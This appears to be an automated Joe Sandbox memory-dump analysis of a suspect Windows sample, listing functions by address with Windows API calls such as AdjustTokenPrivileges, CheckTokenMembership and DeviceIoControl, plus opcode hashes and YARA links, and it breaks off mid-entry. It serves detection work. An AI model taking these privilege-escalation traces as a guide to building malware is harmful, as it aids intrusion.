Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 484984583ad4938ac70a8499eaa17cb1d3ef1ec67dcef6b200e59627b1eae9aa
Instruction ID: 855838e7d189666f827a8e49ca91d48cff051354667c1bc9354e541f2fb08e1d
Opcode Fuzzy Hash: 484984583ad4938ac70a8499eaa17cb1d3ef1ec67dcef6b200e59627b1eae9aa
Instruction Fuzzy Hash: 4C218E35A10618EFCB01EF65D881AADBBB8FF48310F1480AAE905AB361CB31A955CF50

Function 00328CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 002F0FF6: std::exception::exception.LIBCMT ref: 002F102C
Part of subcall function 002F0FF6: __CxxThrowException@8.LIBCMT ref: 002F1041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00328D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00328D3A
GetLastError.KERNEL32 ref: 00328D47

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 86b4df3333ce91d16effc32e65130dd0f46508fe313e90da3b9adf20efc5e2cc
Instruction ID: 3c1f6b1635a58d17fabc4e7583ccb2d7efeb15cb4a4be71726f0487e6c5a309f
Opcode Fuzzy Hash: 86b4df3333ce91d16effc32e65130dd0f46508fe313e90da3b9adf20efc5e2cc
Instruction Fuzzy Hash: B61191B1414309AFE728EF54EC85D7BB7BCFB44751B24862EF45693691EF30AC508A60

Function 00334021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0033404B
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00334088
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00334091

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 6f84dad7520a36b0b5dba44712fef5bf78e3dc7ff15702c339a2db73676d1b1e
Instruction ID: a9a589eb516eca054f34693ace564fd2b41e5e2075aab0c766e9c21dab1f367e
Opcode Fuzzy Hash: 6f84dad7520a36b0b5dba44712fef5bf78e3dc7ff15702c339a2db73676d1b1e
Instruction Fuzzy Hash: D311A1B1E00228BEE7119BE8DC44FBFBBBCEB08710F010656BA04E71A1D2746E0487E1

Function 00334C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00334C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00334C43
FreeSid.ADVAPI32(?), ref: 00334C53

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: f48b397172f87bed5999cf224e4c6ffdf36231288d725ed5293dfdbf98cccea1
Instruction ID: 064e96cb7f46ccab85a44e39833ebb8ebe74b3b597906e23400dd8bd457fa609
Opcode Fuzzy Hash: f48b397172f87bed5999cf224e4c6ffdf36231288d725ed5293dfdbf98cccea1
Instruction Fuzzy Hash: CAF03775A11308BFDB04DFE0DC89ABEBBBCEB08311F0044A9A902E2191E6706A048B50

Function 00338B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00338B25

Part of subcall function 002F543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003391F8,00000000,?,?,?,?,003393A9,00000000,?), ref: 002F5443
Part of subcall function 002F543A: __aulldiv.LIBCMT ref: 002F5463

Strings

0u9, xrefs: 00338B1C

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0u9
API String ID: 2893107130-3597089081
Opcode ID: f422e22379002937623bd0c7c17ab3a2607a0ad8ecd803d065592438b62c4a67
Instruction ID: 671215821a0ad18b6ef83dd4d916f195d1761ab9e813b03d83b0c922fcb7d70a
Opcode Fuzzy Hash: f422e22379002937623bd0c7c17ab3a2607a0ad8ecd803d065592438b62c4a67
Instruction Fuzzy Hash: 92210272634610CBC32ACF25D441A52B3E1EBA5310F298E2CE0E5CB2D0CA71BD05CB94

Function 002DE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba864a76d0e7b4dd4f8839834d1f8b8da9abe72b85c68f336318119888d4ae4
Instruction ID: d3f99cb73a84ebbe5d80c0749d8b44eb738fb11ad831d97f4cfe1f3cfbed7150
Opcode Fuzzy Hash: 0ba864a76d0e7b4dd4f8839834d1f8b8da9abe72b85c68f336318119888d4ae4
Instruction Fuzzy Hash: 19228C74A20216CFDF24EF54C484ABAB7B0FF18300F15816AE856AB341E770ADA5CB91

Function 002D16DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

Part of subcall function 002D25DB: GetWindowLongW.USER32(?,000000EB), ref: 002D25EC

GetParent.USER32(?), ref: 0030BA0A
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,002D19B3,?,?,?,00000006,?), ref: 0030BA84

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: 3660532492803346defed024184810b28696c9977b3364e7dab40e8cb93ca1f1
Instruction ID: 51ba5648bfa1f9e1e2a9b39270605fb842863bc0dae9264da517740dc8167eb9
Opcode Fuzzy Hash: 3660532492803346defed024184810b28696c9977b3364e7dab40e8cb93ca1f1
Instruction Fuzzy Hash: 6021F234215104BFDB228F28C885DA97B96EB0A360F144256F5255B7F2C7319D31DB10

Function 0033C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0033C966
FindClose.KERNEL32(00000000), ref: 0033C996

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 221538619f143ff1518fe3f1cfa8815bbbe31228e67d864369119914117c596f
Instruction ID: b7546bbbf0d681ed3e457f7d82907978919a8d97d973375a4e717f784bef00bd
Opcode Fuzzy Hash: 221538619f143ff1518fe3f1cfa8815bbbe31228e67d864369119914117c596f
Instruction Fuzzy Hash: 68115E766106109FD710EF29D845A2AF7E9EF84325F11891EF9A9DB3A1DB30AC10CB81

Function 0035C86D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0030BB8A,?,?,?), ref: 0035C8E1

Part of subcall function 002D25DB: GetWindowLongW.USER32(?,000000EB), ref: 002D25EC

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0035C8C7

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: fc7d635318230ad4a7a21d80f58665cb9ee852ea678d8b5e29fc92abd86933fa
Instruction ID: ee69c43415eb68b2d249046050b797687315604d36ad62ca93712030bf03f02f
Opcode Fuzzy Hash: fc7d635318230ad4a7a21d80f58665cb9ee852ea678d8b5e29fc92abd86933fa
Instruction Fuzzy Hash: 4801B531211314AFCB235F14DC45E663BBAFB85369F140529FD510B2B0C7329C15EB91

Function 0035CC2E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0035CC51
NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0030BC66,?,?,?,?,?), ref: 0035CC7A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: 210709c0f85ddf6e6a66696a58580472b185e3dcd01ac611b439b2fc19667f45
Instruction ID: 4f8f42af2cc6ab2c553f083576ac584368ce664c7cd7d5ad2a2a72d7a339e363
Opcode Fuzzy Hash: 210709c0f85ddf6e6a66696a58580472b185e3dcd01ac611b439b2fc19667f45
Instruction Fuzzy Hash: 66F0177241021CBFEB069F85DC099AE7BBDEB48312F14416AF945A2161D3716A64EBA0

Function 0033A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0034977D,?,0035FB84,?), ref: 0033A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0034977D,?,0035FB84,?), ref: 0033A314

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 3c0f503244b749adcca29337d4351597082bba822e2790b78da23ccbbd07ac1e
Instruction ID: 9302a37f86523d282e16e911c1abb558a5fddda65a0382ea777c8ea58f31842f
Opcode Fuzzy Hash: 3c0f503244b749adcca29337d4351597082bba822e2790b78da23ccbbd07ac1e
Instruction Fuzzy Hash: E1F0823954532DABEB22AFA4CC48FEA776DBF08761F004166B949D7191D7309940CBA1

Function 0035CD6C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0035CD74
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0030BBE5,?,?,?,?), ref: 0035CDA2

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 909293fb632f6b67b16d63ec0cc7234874985eba14c7f5bb2bbceb1e6834c138
Instruction ID: 5083e785c88da95755cd4c2d0b0d5827e9fc3e92444c2847784a0163d3a40aaa
Opcode Fuzzy Hash: 909293fb632f6b67b16d63ec0cc7234874985eba14c7f5bb2bbceb1e6834c138
Instruction Fuzzy Hash: AAE08670100358BFEB165F19DC19FBA3BA8EB05752F508625FD56D90F1C7719850D760

Function 00328713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00328851), ref: 00328728
CloseHandle.KERNEL32(?,?,00328851), ref: 0032873A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 80d163382673de1b898449f6a09eb4efafc224e6fc9c5135868b95e0199629b6
Instruction ID: 6542ea655bd93e5c8b449d8f8f833e00aa85e51810901c2819771d3ad35d1826
Opcode Fuzzy Hash: 80d163382673de1b898449f6a09eb4efafc224e6fc9c5135868b95e0199629b6
Instruction Fuzzy Hash: C7E0BF75011610EEE7262B64EC05D77B7ADEB04351B14843DB95681470DB615CA0DF10

Function 002FA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,00364178,002F8F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 002FA39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002FA3A3

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ebaf47ad8bf0f24390ae7ddad7698e105472ad67f38b47b5816f27502fca8378
Instruction ID: 973e0738fb69f4726c8f1992845adcf4919a085a2bdd39ec21890124f5a9c66e
Opcode Fuzzy Hash: ebaf47ad8bf0f24390ae7ddad7698e105472ad67f38b47b5816f27502fca8378
Instruction Fuzzy Hash: 2EB09235054308AFEA022F91ED09B893F7CEB44BA3F404020F60D84070CB6254508A91

Function 002FF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 419d4f91e0887aafb8a4cafdb2c22a1544b57ced96be7142f58349cff2459d2e
Instruction ID: ef7c9ffc3eb95f423c3d22b33d28f8e059303d1a5f73480a92a25ea8abff43b1
Opcode Fuzzy Hash: 419d4f91e0887aafb8a4cafdb2c22a1544b57ced96be7142f58349cff2459d2e
Instruction Fuzzy Hash: 1A322522D79F054DD7639A34D932335A24CAFB73C8F55D737E81AB5AA6EB68C4834100

Function 0030267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386c251a7845ef3045f878a15bcb77aa074f104c24ffada56d31e366713c621d
Instruction ID: 94b0ba9bd9e236c5bd7a5db2b3636b4538a45eb1008bd737055ce5330fd381e2
Opcode Fuzzy Hash: 386c251a7845ef3045f878a15bcb77aa074f104c24ffada56d31e366713c621d
Instruction Fuzzy Hash: D1B11320D2AF414DD32396398835336BB4CAFBB2C5F52D71BFC2674E62EB6285834641

Function 0035D6C6 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D25DB: GetWindowLongW.USER32(?,000000EB), ref: 002D25EC

NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0030BBA2,?,?,?,?,00000000,?), ref: 0035D740

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: f72c110b952c863d3e9d145047c4d54f3f4acf4cb5dbbfe9bc84d825478302cf
Instruction ID: a458ead1bc91e6d2aac779d9ec349ea1fcedfe10ca02e848309763fbadc3e3e0
